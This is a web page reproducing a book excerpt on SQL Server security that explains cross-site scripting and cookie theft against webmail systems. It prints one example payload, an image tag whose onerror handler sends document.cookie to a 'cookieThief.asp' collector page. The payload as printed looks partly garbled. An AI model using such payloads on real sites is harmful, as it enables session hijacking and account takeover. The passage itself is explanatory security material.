Oracle Consulting Oracle Training Oracle Support Development
Oracle Books
SQL Server Books
IT Books
Job Interview Books
Rampant Horse Books
911 Series
Pedagogue Books

Oracle Software
Write for Rampant
Publish with Rampant
Rampant News
Rampant Authors
Rampant Staff
Oracle News
Oracle Forum
Oracle Tips
Articles by our Authors
Press Releases
SQL Server Books

Oracle 11g Books

Oracle tuning

Oracle training

Oracle support

Remote Oracle


Privacy Policy


  SQL Server Tips by Burleson

Cross-site scripting (XSS)

Cross-site scripting consists of inserting script code (usually Javascript or VBScript) or calling malicious Java applets, ActiveX or Flash. This will occur in a hyperlink, a frame or iframe, a variable on a CGI, the input of a web application or any other technique that allows code from one site to be executed in another site. Sometimes this is called script injection, or “phishing” when the technique is aimed at stealing financial data by means of spoofed emails and fake websites or real websites with some script running in the background to steal passwords, spoofed web browser address bar, etc…

On certain webmail systems that allow HTML and run scripts without, it is possible to do a “cookie theft”. This happens because the script is running in the webmail site and it can read the authentication cookie from that site. With this cookie, an attacker can gain access to the email account. There are exploits that run silently and without the need of a user to click on a hyperlink, all that it takes is to open an email. This is an example:

<IMG width="0" height="0" onerror="' /cookieThief.asp?'+document.cookie);" src="::">

The onerror event handler will fire because the source for the image is invalid. This will open a window that will run an ASP page made with the sole purpose of taking the authentication cookie from that site and storing it. It might even have code to open a window and use that cookie to access the webmail account and change its password.

The above book excerpt is from:

Super SQL Server Systems
Turbocharge Database Performance with C++ External Procedures

ISBN: 0-9761573-2-2
Joseph Gama, P. J. Naughter  

Linux Oracle commands syntax poster

ION Oracle tuning software

Oracle data dictionary reference poster

Oracle Forum

BC Oracle consulting support training

BC remote Oracle DBA   



 Copyright © 1996 -2017 by Burleson. All rights reserved.

Oracle® is the registered trademark of Oracle Corporation. SQL Server® is the registered trademark of Microsoft Corporation. 
Many of the designations used by computer vendors to distinguish their products are claimed as Trademarks

Hit Counter